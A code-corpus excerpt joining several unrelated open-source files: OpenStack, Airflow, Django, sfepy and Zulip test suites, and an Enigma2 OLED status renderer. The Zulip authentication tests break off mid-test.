ChinaMassClouds/copenstack-server | refs/heads/master | openstack/src/nova-2014.2/nova/api/openstack/compute/contrib/extended_networks.py | 95 | # Copyright 2014 Nebula, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.api.openstack import extensions
class Extended_networks(extensions.ExtensionDescriptor):
"""Adds additional fields to networks."""
name = "ExtendedNetworks"
alias = "os-extended-networks"
namespace = ("http://docs.openstack.org/compute/ext/extended_networks"
"/api/v2")
updated = "2014-05-09T00:00:00Z"
|
danielvdende/incubator-airflow | refs/heads/master | tests/hooks/test_pig_hook.py | 14 | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
from airflow.hooks.pig_hook import PigCliHook
try:
from unittest import mock
except ImportError:
try:
import mock
except ImportError:
mock = None
class TestPigCliHook(unittest.TestCase):
def setUp(self):
super(TestPigCliHook, self).setUp()
self.extra_dejson = mock.MagicMock()
self.extra_dejson.get.return_value = None
self.conn = mock.MagicMock()
self.conn.extra_dejson = self.extra_dejson
conn = self.conn
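        # Subclass the hook so get_connection() returns the mocked connection
        # above instead of looking up a real Airflow connection.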
class SubPigCliHook(PigCliHook):
def get_connection(self, id):
return conn
self.pig_hook = SubPigCliHook
def test_init(self):
self.pig_hook()
self.extra_dejson.get.assert_called_with('pig_properties', '')
@mock.patch('subprocess.Popen')
def test_run_cli_success(self, popen_mock):
proc_mock = mock.MagicMock()
proc_mock.returncode = 0
proc_mock.stdout.readline.return_value = b''
popen_mock.return_value = proc_mock
hook = self.pig_hook()
stdout = hook.run_cli("")
self.assertEqual(stdout, "")
@mock.patch('subprocess.Popen')
def test_run_cli_fail(self, popen_mock):
proc_mock = mock.MagicMock()
proc_mock.returncode = 1
proc_mock.stdout.readline.return_value = b''
popen_mock.return_value = proc_mock
hook = self.pig_hook()
from airflow.exceptions import AirflowException
self.assertRaises(AirflowException, hook.run_cli, "")
@mock.patch('subprocess.Popen')
def test_run_cli_with_properties(self, popen_mock):
test_properties = "one two"
proc_mock = mock.MagicMock()
proc_mock.returncode = 0
proc_mock.stdout.readline.return_value = b''
popen_mock.return_value = proc_mock
hook = self.pig_hook()
hook.pig_properties = test_properties
stdout = hook.run_cli("")
self.assertEqual(stdout, "")
popen_first_arg = popen_mock.call_args[0][0]
for pig_prop in test_properties.split():
self.assertIn(pig_prop, popen_first_arg)
@mock.patch('subprocess.Popen')
def test_run_cli_verbose(self, popen_mock):
test_stdout_lines = [b"one", b"two", b""]
test_stdout_strings = [s.decode('utf-8') for s in test_stdout_lines]
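        # run_cli reads stdout line by line until it gets b'', so the verbose
        # output collected here should be the decoded lines joined together.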
proc_mock = mock.MagicMock()
proc_mock.returncode = 0
proc_mock.stdout.readline = mock.Mock(side_effect=test_stdout_lines)
popen_mock.return_value = proc_mock
hook = self.pig_hook()
stdout = hook.run_cli("", verbose=True)
self.assertEqual(stdout, "".join(test_stdout_strings))
def test_kill_no_sp(self):
sp_mock = mock.Mock()
hook = self.pig_hook()
hook.sp = sp_mock
hook.kill()
self.assertFalse(sp_mock.kill.called)
def test_kill_sp_done(self):
sp_mock = mock.Mock()
sp_mock.poll.return_value = 0
hook = self.pig_hook()
hook.sp = sp_mock
hook.kill()
self.assertFalse(sp_mock.kill.called)
def test_kill(self):
sp_mock = mock.Mock()
sp_mock.poll.return_value = None
hook = self.pig_hook()
hook.sp = sp_mock
hook.kill()
self.assertTrue(sp_mock.kill.called)
|
luosch/vinda | refs/heads/master | vinda/__init__.py | 1 | #!/usr/bin/python
# -*- coding:utf-8 -*-
__title__ = 'vinda'
__version__ = '0.1.0'
__author__ = 'Sicheng Luo'
__license__ = 'MIT'
__copyright__ = 'Copyright 2016 Sicheng Luo'
from .vinda import look |
aberon10/training | refs/heads/master | training/ticketing_system/apps.py | 1 | from django.apps import AppConfig
class TicketingSystemConfig(AppConfig):
name = 'ticketing_system'
|
lathama/Adynaton | refs/heads/master | adynaton/unittests/test_DomainNameSystemClient.py | 1 | """
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
"""
import unittest
from adynaton.dns import DomainNameSystemClient
class TestDomainNameSystemClient(unittest.TestCase):
"""
    Tests for the DomainNameSystemClient object.
"""
def setUp(self):
"""
Setup for unit tests
"""
self.theclass = DomainNameSystemClient()
self.theclass.DNS_UDP_port = 0
self.DNS_query = "example.com"
def test_set_query(self):
"""
Method Test
"""
self.theclass.set_query(self.DNS_query)
self.assertEqual(self.theclass.DNS_query, self.DNS_query)
|
jamespacileo/django-france | refs/heads/master | tests/modeltests/one_to_one/tests.py | 92 | from django.test import TestCase
from django.db import transaction, IntegrityError
from models import Place, Restaurant, Waiter, ManualPrimaryKey, RelatedModel, MultiModel
class OneToOneTests(TestCase):
def setUp(self):
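        # Create two places and attach a restaurant to the first one; the tests
        # below exercise both directions of the one-to-one relation.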
self.p1 = Place(name='Demon Dogs', address='944 W. Fullerton')
self.p1.save()
self.p2 = Place(name='Ace Hardware', address='1013 N. Ashland')
self.p2.save()
self.r = Restaurant(place=self.p1, serves_hot_dogs=True, serves_pizza=False)
self.r.save()
def test_getter(self):
# A Restaurant can access its place.
self.assertEqual(repr(self.r.place), '<Place: Demon Dogs the place>')
# A Place can access its restaurant, if available.
self.assertEqual(repr(self.p1.restaurant), '<Restaurant: Demon Dogs the restaurant>')
# p2 doesn't have an associated restaurant.
self.assertRaises(Restaurant.DoesNotExist, getattr, self.p2, 'restaurant')
def test_setter(self):
# Set the place using assignment notation. Because place is the primary
# key on Restaurant, the save will create a new restaurant
self.r.place = self.p2
self.r.save()
self.assertEqual(repr(self.p2.restaurant), '<Restaurant: Ace Hardware the restaurant>')
self.assertEqual(repr(self.r.place), '<Place: Ace Hardware the place>')
self.assertEqual(self.p2.pk, self.r.pk)
# Set the place back again, using assignment in the reverse direction.
self.p1.restaurant = self.r
self.assertEqual(repr(self.p1.restaurant), '<Restaurant: Demon Dogs the restaurant>')
r = Restaurant.objects.get(pk=self.p1.id)
self.assertEqual(repr(r.place), '<Place: Demon Dogs the place>')
def test_manager_all(self):
# Restaurant.objects.all() just returns the Restaurants, not the Places.
self.assertQuerysetEqual(Restaurant.objects.all(), [
'<Restaurant: Demon Dogs the restaurant>',
])
# Place.objects.all() returns all Places, regardless of whether they
# have Restaurants.
self.assertQuerysetEqual(Place.objects.order_by('name'), [
'<Place: Ace Hardware the place>',
'<Place: Demon Dogs the place>',
])
def test_manager_get(self):
def assert_get_restaurant(**params):
self.assertEqual(repr(Restaurant.objects.get(**params)),
'<Restaurant: Demon Dogs the restaurant>')
assert_get_restaurant(place__id__exact=self.p1.pk)
assert_get_restaurant(place__id=self.p1.pk)
assert_get_restaurant(place__exact=self.p1.pk)
assert_get_restaurant(place__exact=self.p1)
assert_get_restaurant(place=self.p1.pk)
assert_get_restaurant(place=self.p1)
assert_get_restaurant(pk=self.p1.pk)
assert_get_restaurant(place__pk__exact=self.p1.pk)
assert_get_restaurant(place__pk=self.p1.pk)
assert_get_restaurant(place__name__startswith="Demon")
def assert_get_place(**params):
self.assertEqual(repr(Place.objects.get(**params)),
'<Place: Demon Dogs the place>')
assert_get_place(restaurant__place__exact=self.p1.pk)
assert_get_place(restaurant__place__exact=self.p1)
assert_get_place(restaurant__place__pk=self.p1.pk)
assert_get_place(restaurant__exact=self.p1.pk)
assert_get_place(restaurant__exact=self.r)
assert_get_place(restaurant__pk=self.p1.pk)
assert_get_place(restaurant=self.p1.pk)
assert_get_place(restaurant=self.r)
assert_get_place(id__exact=self.p1.pk)
assert_get_place(pk=self.p1.pk)
def test_foreign_key(self):
# Add a Waiter to the Restaurant.
w = self.r.waiter_set.create(name='Joe')
w.save()
self.assertEqual(repr(w), '<Waiter: Joe the waiter at Demon Dogs the restaurant>')
# Query the waiters
def assert_filter_waiters(**params):
self.assertQuerysetEqual(Waiter.objects.filter(**params), [
'<Waiter: Joe the waiter at Demon Dogs the restaurant>'
])
assert_filter_waiters(restaurant__place__exact=self.p1.pk)
assert_filter_waiters(restaurant__place__exact=self.p1)
assert_filter_waiters(restaurant__place__pk=self.p1.pk)
assert_filter_waiters(restaurant__exact=self.p1.pk)
assert_filter_waiters(restaurant__exact=self.p1)
assert_filter_waiters(restaurant__pk=self.p1.pk)
assert_filter_waiters(restaurant=self.p1.pk)
assert_filter_waiters(restaurant=self.r)
assert_filter_waiters(id__exact=self.p1.pk)
assert_filter_waiters(pk=self.p1.pk)
# Delete the restaurant; the waiter should also be removed
r = Restaurant.objects.get(pk=self.p1.pk)
r.delete()
self.assertEqual(Waiter.objects.count(), 0)
def test_multiple_o2o(self):
# One-to-one fields still work if you create your own primary key
o1 = ManualPrimaryKey(primary_key="abc123", name="primary")
o1.save()
o2 = RelatedModel(link=o1, name="secondary")
o2.save()
# You can have multiple one-to-one fields on a model, too.
x1 = MultiModel(link1=self.p1, link2=o1, name="x1")
x1.save()
self.assertEqual(repr(o1.multimodel), '<MultiModel: Multimodel x1>')
# This will fail because each one-to-one field must be unique (and
# link2=o1 was used for x1, above).
sid = transaction.savepoint()
mm = MultiModel(link1=self.p2, link2=o1, name="x1")
self.assertRaises(IntegrityError, mm.save)
transaction.savepoint_rollback(sid)
|
sfepy/sfepy | refs/heads/master | tests/test_dg_terms_calls.py | 4 | # -*- coding: utf-8 -*-
"""
Test all terms in terms_dg. Performs numerical tests on a simple mesh.
"""
import functools
import inspect
import numpy as nm
import numpy.testing as nmts
import scipy.sparse as sp
from sfepy.base.base import Struct
from sfepy.base.testing import TestCommon
from sfepy.discrete import DGFieldVariable, Material, Integral
from sfepy.discrete import Variables
from sfepy.discrete.common.dof_info import EquationMap
from sfepy.terms.terms_dg import AdvectionDGFluxTerm, \
NonlinearHyperbolicDGFluxTerm, NonlinearScalarDotGradTerm, \
DiffusionDGFluxTerm, DiffusionInteriorPenaltyTerm
from test_dg_field import prepare_dgfield_1D, prepare_field_2D
class Test(TestCommon):
def capture_assertion_decorator(self, method):
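        # Wrap a term test method so that an AssertionError is reported as a
        # False return value, matching the boolean pass/fail convention of
        # these tests.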
@functools.wraps(method)
def captured_assertion_method(_):
try:
method()
except AssertionError:
return False
return True
return captured_assertion_method.__get__(self, self.__class__)
@staticmethod
def from_conf(conf, options):
"""
        Collects the Test*Term classes defined in this module and gathers their
        test methods into the resulting Test object.
"""
term_test_classes = [(key, var) for key, var in dict(globals()).items()
if (key.startswith("Test") and key.endswith("Term"))]
all_test = Test()
for cname, term_test_cls in term_test_classes:
term_test = term_test_cls()
methods = inspect.getmembers(term_test, inspect.ismethod)
all_test.update({"{}_{}".format(mname, cname[4:]):
all_test.capture_assertion_decorator(meth)
for mname, meth in methods})
return all_test
class DGTermTestEnvornment:
"""
Class for easy creation of all the data needed for testing terms.
"""
def burg_fun(self, u):
vu = self.burg_velo * u[..., None] ** 2
return vu
def burg_fun_d(self, u):
v1 = 2 * self.burg_velo * u[..., None]
return v1
def __init__(self, dim, approx_order, **kwargs):
"""
Creates Struct object with all the data necessary to test terms
:param dim: dimension
:param approx_order: approximation order
:param kwargs: velo, diffusion or penalty for prepare_materials
:return: term test scope
"""
if dim == 1:
(field, regions), mesh = prepare_dgfield_1D(approx_order)
elif dim == 2:
(field, regions), mesh = prepare_field_2D(approx_order)
self.field = field
self.regions = regions
self.mesh = mesh
self.n_cell = field.n_cell
self.n_nod = field.n_nod
self.n_el_nod = field.n_el_nod
self.u, self.v = self.prepare_variables(field)
self.u.data = [(nm.zeros(self.n_nod))]
        self.variables = Variables([self.u, self.v])
self.integral = Integral('i', order=approx_order * 2)
self.a, self.D, self.Cw = self.prepare_materials(field, **kwargs)
if dim == 1:
velo = nm.array(1.0)
elif dim == 2:
velo = nm.array([1.0, 0])
self.burg_velo = velo.T / nm.linalg.norm(velo)
self.nonlin = Material('nonlin',
values={'.fun': self.burg_fun,
'.dfun': self.burg_fun_d})
self.out = nm.zeros((self.n_cell, 1, self.n_el_nod, 1))
def prepare_variables(self, field):
"""
Prepares state and test variables, adds empty
eq_map to state variable
:param field:
:return: state, test
"""
n_nod = field.n_nod
u = DGFieldVariable('u', 'unknown', field, history=1)
v = DGFieldVariable('v', 'test', field, primary_var_name='u')
var_di = Struct(
details=Struct(dpn=1, n_nod=n_nod,
name="field_var_dof_details"),
indx=slice(0, n_nod, None), n_dof=n_nod, name='u_dof_info',
var_name="u")
u.eq_map = EquationMap("eq_map", ["u.0"], var_di)
u.eq_map._init_empty(field)
return u, v
def prepare_materials(self, field, velo=1.0, diffusion=0.1, penalty=100):
"""
        Creates material objects with a data attribute containing properly
        shaped data to pass to terms
:param field: DGField
:param velo: optional values for velocity a
:param diffusion: optional value for diffusion tensor D
:param penalty: optional value for diffusion penalty Cw
:return: a, D, Cw
"""
a = Material('a', val=[velo])
a.data = nm.ones((field.n_cell, 1)) * velo
D = Material('D', val=[diffusion])
D.data = nm.ones((field.n_cell, 1, 1)) * diffusion
Cw = Material("Cw", values={".val": penalty})
Cw.data = penalty
return a, D, Cw
class TestAdvectDGFluxTerm:
def test_function_explicit_1D(self):
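        # With a zero state vector the advection flux must evaluate to zero.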
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = AdvectionDGFluxTerm("adv_stiff(a.val, u, v)",
"a.val, u[-1], v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, a=te.a)
# te.u.data[0][::te.n_el_nod] = 1
result = nm.zeros(te.out.shape)
out, _ = term.function(te.out,
te.u,
None, # diff_var
te.field,
te.regions["omega"],
te.a.data
)
nmts.assert_almost_equal(out, result)
return True
def test_function_implicit_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = AdvectionDGFluxTerm("adv_stiff(a.val, u, v)",
"a.val, u, v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, a=te.a)
# te.u.data[0][::ts.n_el_nod] = 1
expected = nm.zeros(((te.n_cell * te.n_el_nod),) * 2)
(out, iel1, iel2, _, _), _ = term.function(
te.out, # out, note that for implicit mode the out
# argument is ignored
te.u, # state
"u", # diff_var
te.field,
te.regions["omega"],
te.a.data, # advelo
)
out = sp.csr_matrix((out, (iel1, iel2)),
shape=((te.n_cell * te.n_el_nod),) * 2).toarray()
assert expected.shape == out.shape
return True
class TestNonlinearHyperDGFluxTerm:
def test_function_explicit_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = NonlinearHyperbolicDGFluxTerm("adv_stiff(f, df u, v)",
"nonlin.f, nonlin.df, u[-1], v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, nonlin=te.nonlin)
# te.u.data[0][::ts.n_el_nod] = 1
result = nm.zeros(te.out.shape)
out, _ = term.function(te.out,
te.u,
te.field,
te.regions["omega"],
te.burg_fun,
te.burg_fun_d
)
nmts.assert_almost_equal(out, result)
return True
class TestDiffusionDGFluxTerm:
def test_function_explicit_right_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = DiffusionDGFluxTerm("diff_lf_flux(D.val, v, u)",
"D.val, v, u[-1]",
te.integral, te.regions["omega"],
u=te.u, v=te.v, D=te.D)
term.mode = "avg_state"
result = nm.zeros(te.out.shape)
out, _ = term.function(te.out, # out
te.u, # state
None, # diff_var, explicit
te.field,
te.regions["omega"],
te.D.data, # advelo
)
nmts.assert_almost_equal(out, result)
return True
def test_function_explicit_left_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = DiffusionDGFluxTerm("diff_lf_flux(D.val, u, v)",
"D.val, u[-1], v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, D=te.D)
term.mode = "avg_virtual"
result = nm.zeros(te.out.shape)
out, _ = term.function(te.out, # out
te.u, # state
None, # diff_var, explicit
te.field,
te.regions["omega"],
te.D.data, # advelo
)
nmts.assert_almost_equal(out, result)
return True
def test_function_implicit_right_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = DiffusionDGFluxTerm("diff_lf_flux(D.val, v, u)",
"D.val, v, u",
te.integral, te.regions["omega"],
u=te.u, v=te.v, D=te.D)
term.mode = "avg_state"
expected = nm.zeros(((te.n_cell * te.n_el_nod),) * 2)
(out, iel1, iel2, _, _), _ = term.function(
te.out, # out
te.u, # state
"u", # diff_var, explicit
te.field,
te.regions["omega"],
te.D.data, # advelo
)
out = sp.csr_matrix((out, (iel1, iel2)),
shape=((te.n_cell * te.n_el_nod),) * 2).toarray()
assert expected.shape == out.shape
return True
def test_function_implicit_left_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = DiffusionDGFluxTerm("diff_lf_flux(D.val, u, v)",
"D.val, u[-1], v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, D=te.D)
term.mode = "avg_virtual"
expected = nm.zeros(((te.n_cell * te.n_el_nod),) * 2)
(out, iel1, iel2, _, _), _ = term.function(
te.out, # out
te.u, # state
"u", # diff_var, explicit
te.field,
te.regions["omega"],
te.D.data, # advelo
)
out = sp.csr_matrix((out, (iel1, iel2)),
shape=((te.n_cell * te.n_el_nod),) * 2).toarray()
assert expected.shape == out.shape
return True
class TestDiffusionInteriorPenaltyTerm:
def test_function_explicit_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = DiffusionInteriorPenaltyTerm("adv_stiff(Cw.val, u, v)",
"Cw.val, u[-1], v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, Cw=te.Cw)
# te.u.data[0][::ts.n_el_nod] = 1
result = nm.zeros(te.out.shape)
out, _ = term.function(te.out,
te.u,
None, # diff_var
te.field,
te.regions["omega"],
te.Cw.data,
te.D.data
)
nmts.assert_almost_equal(out, result)
return True
def test_function_implicit_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = DiffusionInteriorPenaltyTerm("adv_stiff(D.val, a.val, u, v)",
"Cw.val, u, v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, a=te.Cw)
# te.u.data[0][::ts.n_el_nod] = 1
expected = nm.zeros(((te.n_cell * te.n_el_nod),) * 2)
(out, iel1, iel2, _, _), _ = term.function(
te.out, # out, note that for implicit mode the out
# argument is ignored
te.u, # state
"u", # diff_var
te.field,
te.regions["omega"],
te.Cw.data,
te.D.data,
)
out = sp.csr_matrix((out, (iel1, iel2)),
shape=((te.n_cell * te.n_el_nod),) * 2).toarray()
assert expected.shape == out.shape
return True
class TestNonlinScalarDotGradTerm:
def test_function_explicit_1D(self):
te = DGTermTestEnvornment(dim=1, approx_order=3)
term = NonlinearScalarDotGradTerm("adv_stiff(f, df u, v)",
"nonlin.f, nonlin.df, u[-1], v",
te.integral, te.regions["omega"],
u=te.u, v=te.v, nonlin=te.nonlin)
term.setup()
# te.u.data[0][::ts.n_el_nod] = 1
expected = nm.zeros(te.out.shape)
out = nm.zeros(te.out.shape)
fargs = term.get_fargs(
te.burg_fun,
te.burg_fun_d,
te.u,
te.v
)
fargs = (out,) + fargs
out = term.function(*fargs)
nmts.assert_almost_equal(out, expected)
return True
if __name__ == '__main__':
t = Test()
t.test_dg_term_calls() |
sklnet/openhdf-enigma2 | refs/heads/master | lib/python/Components/Renderer/valioOledInfo.py | 2 | # -*- coding: utf-8 -*-
#
# OLED-Info Renderer for Dreambox/Enigma-2
# Version: 1.0
# Coded by Vali (c)2011
#
#######################################################################
from enigma import eLabel
from Renderer import Renderer
from os import popen
from time import localtime, strftime
from Components.VariableText import VariableText
from Components.Sensors import sensors
from Components.config import config
from Tools.HardwareInfo import HardwareInfo
class valioOledInfo(Renderer, VariableText):
def __init__(self):
Renderer.__init__(self)
VariableText.__init__(self)
try:
self.infozahl = int(config.valiflex.OledInfo.value)
except:
self.infozahl = 12
self.Zaehler = 0
self.oben = "---"
self.unten = "---"
GUI_WIDGET = eLabel
def changed(self, what):
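        # Cycle through the OLED pages (clock, CPU temperature, load average
        # and free memory) based on the self.Zaehler counter; the label is
        # hidden for the first part of each cycle.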
if not self.suspended:
if self.Zaehler > self.infozahl:
self.Zaehler = 0
if self.Zaehler == 0:
self.hide()
elif self.Zaehler == 6:
self.show()
t = localtime(self.source.time)
self.oben = _(strftime("%a", t)) + " " +strftime("%d", t)
self.unten = "%02d:%02d" % (t.tm_hour, t.tm_min)
elif self.Zaehler == 14:
self.oben = "temp:"
maxtemp = 0
try:
templist = sensors.getSensorsList(sensors.TYPE_TEMPERATURE)
tempcount = len(templist)
for count in range(tempcount):
id = templist[count]
tt = sensors.getSensorValue(id)
if tt > maxtemp:
maxtemp = tt
except:
pass
self.unten = str(maxtemp) + " °C"
elif self.Zaehler == 21:
self.oben = "loads:"
loada = 0
try:
out_line = open("/proc/loadavg").readline()
loada = out_line[:4]
except:
pass
self.unten = loada
elif self.Zaehler == 28:
self.oben = "free:"
out_lines = []
out_lines = open("/proc/meminfo").readlines()
for lidx in range(len(out_lines)-1):
tstLine = out_lines[lidx].split()
if "MemFree:" in tstLine:
templ = int(out_lines[lidx].split()[1])
fmem = "%d mb" %(templ/1024)
self.unten = str(fmem)
self.Zaehler = self.Zaehler + 1
self.text = self.oben + "\n" + self.unten
def onShow(self):
self.suspended = False
self.changed(None)
def onHide(self):
self.suspended = True
|
Galexrt/zulip | refs/heads/master | zerver/tests/test_auth_backends.py | 2 | # -*- coding: utf-8 -*-
from django.conf import settings
from django.core import mail
from django.http import HttpResponse
from django.test import override_settings
from django_auth_ldap.backend import _LDAPUser
from django.contrib.auth import authenticate
from django.test.client import RequestFactory
from typing import Any, Callable, Dict, List, Optional, Text
from builtins import object
from oauth2client.crypt import AppIdentityError
from django.core import signing
from django.core.urlresolvers import reverse
import jwt
import mock
import re
import time
from zerver.forms import HomepageForm
from zerver.lib.actions import (
do_deactivate_realm,
do_deactivate_user,
do_reactivate_realm,
do_reactivate_user,
do_set_realm_authentication_methods,
create_stream_if_needed,
)
from zerver.lib.mobile_auth_otp import otp_decrypt_api_key
from zerver.lib.validator import validate_login_email, \
check_bool, check_dict_only, check_string
from zerver.lib.request import JsonableError
from zerver.lib.initial_password import initial_password
from zerver.lib.sessions import get_session_dict_user
from zerver.lib.test_classes import (
ZulipTestCase,
)
from zerver.lib.test_helpers import POSTRequestMock
from zerver.models import \
get_realm, email_to_username, UserProfile, \
PreregistrationUser, Realm, get_user, MultiuseInvite
from confirmation.models import Confirmation, confirmation_url, create_confirmation_link
from zproject.backends import ZulipDummyBackend, EmailAuthBackend, \
GoogleMobileOauth2Backend, ZulipRemoteUserBackend, ZulipLDAPAuthBackend, \
ZulipLDAPUserPopulator, DevAuthBackend, GitHubAuthBackend, ZulipAuthMixin, \
dev_auth_enabled, password_auth_enabled, github_auth_enabled, \
require_email_format_usernames, SocialAuthMixin, AUTH_BACKEND_NAME_MAP, \
ZulipLDAPConfigurationError
from zerver.views.auth import (maybe_send_to_registration,
login_or_register_remote_user,
_subdomain_token_salt)
from version import ZULIP_VERSION
from social_core.exceptions import AuthFailed, AuthStateForbidden
from social_django.strategy import DjangoStrategy
from social_django.storage import BaseDjangoStorage
from social_core.backends.github import GithubOrganizationOAuth2, GithubTeamOAuth2, \
GithubOAuth2
from six.moves import urllib
from six.moves.http_cookies import SimpleCookie
import ujson
from zerver.lib.test_helpers import MockLDAP, load_subdomain_token
class AuthBackendTest(ZulipTestCase):
def get_username(self, email_to_username=None):
# type: (Optional[Callable[[Text], Text]]) -> Text
username = self.example_email('hamlet')
if email_to_username is not None:
username = email_to_username(self.example_email('hamlet'))
return username
def verify_backend(self, backend, good_kwargs=None, bad_kwargs=None):
# type: (Any, Optional[Dict[str, Any]], Optional[Dict[str, Any]]) -> None
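        # Shared helper: authentication must succeed with good_kwargs and fail
        # with bad_kwargs, and must also fail when the user or realm is
        # deactivated or when the backend is disabled server-wide or for the realm.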
user_profile = self.example_user('hamlet')
assert good_kwargs is not None
# If bad_kwargs was specified, verify auth fails in that case
if bad_kwargs is not None:
self.assertIsNone(backend.authenticate(**bad_kwargs))
# Verify auth works
result = backend.authenticate(**good_kwargs)
self.assertEqual(user_profile, result)
# Verify auth fails with a deactivated user
do_deactivate_user(user_profile)
self.assertIsNone(backend.authenticate(**good_kwargs))
# Reactivate the user and verify auth works again
do_reactivate_user(user_profile)
result = backend.authenticate(**good_kwargs)
self.assertEqual(user_profile, result)
# Verify auth fails with a deactivated realm
do_deactivate_realm(user_profile.realm)
self.assertIsNone(backend.authenticate(**good_kwargs))
# Verify auth works again after reactivating the realm
do_reactivate_realm(user_profile.realm)
result = backend.authenticate(**good_kwargs)
self.assertEqual(user_profile, result)
# ZulipDummyBackend isn't a real backend so the remainder
# doesn't make sense for it
if isinstance(backend, ZulipDummyBackend):
return
# Verify auth fails if the auth backend is disabled on server
with self.settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipDummyBackend',)):
self.assertIsNone(backend.authenticate(**good_kwargs))
# Verify auth fails if the auth backend is disabled for the realm
for backend_name in AUTH_BACKEND_NAME_MAP.keys():
if isinstance(backend, AUTH_BACKEND_NAME_MAP[backend_name]):
break
index = getattr(user_profile.realm.authentication_methods, backend_name).number
user_profile.realm.authentication_methods.set_bit(index, False)
user_profile.realm.save()
self.assertIsNone(backend.authenticate(**good_kwargs))
user_profile.realm.authentication_methods.set_bit(index, True)
user_profile.realm.save()
def test_dummy_backend(self):
# type: () -> None
username = self.get_username()
self.verify_backend(ZulipDummyBackend(),
good_kwargs=dict(username=username,
use_dummy_backend=True),
bad_kwargs=dict(username=username,
use_dummy_backend=False))
def setup_subdomain(self, user_profile):
# type: (UserProfile) -> None
realm = user_profile.realm
realm.string_id = 'zulip'
realm.save()
def test_email_auth_backend(self):
# type: () -> None
username = self.get_username()
user_profile = self.example_user('hamlet')
password = "testpassword"
user_profile.set_password(password)
user_profile.save()
with mock.patch('zproject.backends.email_auth_enabled',
return_value=False), \
mock.patch('zproject.backends.password_auth_enabled',
return_value=True):
return_data = {} # type: Dict[str, bool]
user = EmailAuthBackend().authenticate(self.example_email('hamlet'),
password=password,
return_data=return_data)
self.assertEqual(user, None)
self.assertTrue(return_data['email_auth_disabled'])
self.verify_backend(EmailAuthBackend(),
good_kwargs=dict(password=password,
username=username,
realm_subdomain='zulip',
return_data=dict()),
bad_kwargs=dict(password=password,
username=username,
realm_subdomain='acme',
return_data=dict()))
def test_email_auth_backend_disabled_password_auth(self):
# type: () -> None
user_profile = self.example_user('hamlet')
password = "testpassword"
user_profile.set_password(password)
user_profile.save()
# Verify if a realm has password auth disabled, correct password is rejected
with mock.patch('zproject.backends.password_auth_enabled', return_value=False):
self.assertIsNone(EmailAuthBackend().authenticate(self.example_email('hamlet'), password))
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipDummyBackend',))
def test_no_backend_enabled(self):
# type: () -> None
result = self.client_get('/login/')
self.assert_in_success_response(["No authentication backends are enabled"], result)
result = self.client_get('/register/')
self.assert_in_success_response(["No authentication backends are enabled"], result)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.GoogleMobileOauth2Backend',))
def test_any_backend_enabled(self):
# type: () -> None
        # Verify the "no backends enabled" error is not shown when a backend is enabled.
result = self.client_get('/login/')
self.assert_not_in_success_response(["No Authentication Backend is enabled."], result)
result = self.client_get('/register/')
self.assert_not_in_success_response(["No Authentication Backend is enabled."], result)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.GoogleMobileOauth2Backend',))
def test_google_backend(self):
# type: () -> None
user_profile = self.example_user('hamlet')
email = user_profile.email
backend = GoogleMobileOauth2Backend()
payload = dict(email_verified=True,
email=email)
with mock.patch('apiclient.sample_tools.client.verify_id_token', return_value=payload):
self.verify_backend(backend,
good_kwargs=dict(realm_subdomain="zulip"),
bad_kwargs=dict(realm_subdomain='acme'))
# Verify valid_attestation parameter is set correctly
unverified_payload = dict(email_verified=False)
with mock.patch('apiclient.sample_tools.client.verify_id_token', return_value=unverified_payload):
ret = dict() # type: Dict[str, str]
result = backend.authenticate(return_data=ret)
self.assertIsNone(result)
self.assertFalse(ret["valid_attestation"])
nonexistent_user_payload = dict(email_verified=True, email="[email protected]")
with mock.patch('apiclient.sample_tools.client.verify_id_token',
return_value=nonexistent_user_payload):
ret = dict()
result = backend.authenticate(return_data=ret)
self.assertIsNone(result)
self.assertTrue(ret["valid_attestation"])
with mock.patch('apiclient.sample_tools.client.verify_id_token',
side_effect=AppIdentityError):
ret = dict()
result = backend.authenticate(return_data=ret)
self.assertIsNone(result)
@override_settings(AUTHENTICATION_BACKENDS=('zproject.backends.ZulipLDAPAuthBackend',))
def test_ldap_backend(self):
# type: () -> None
user_profile = self.example_user('hamlet')
email = user_profile.email
password = "test_password"
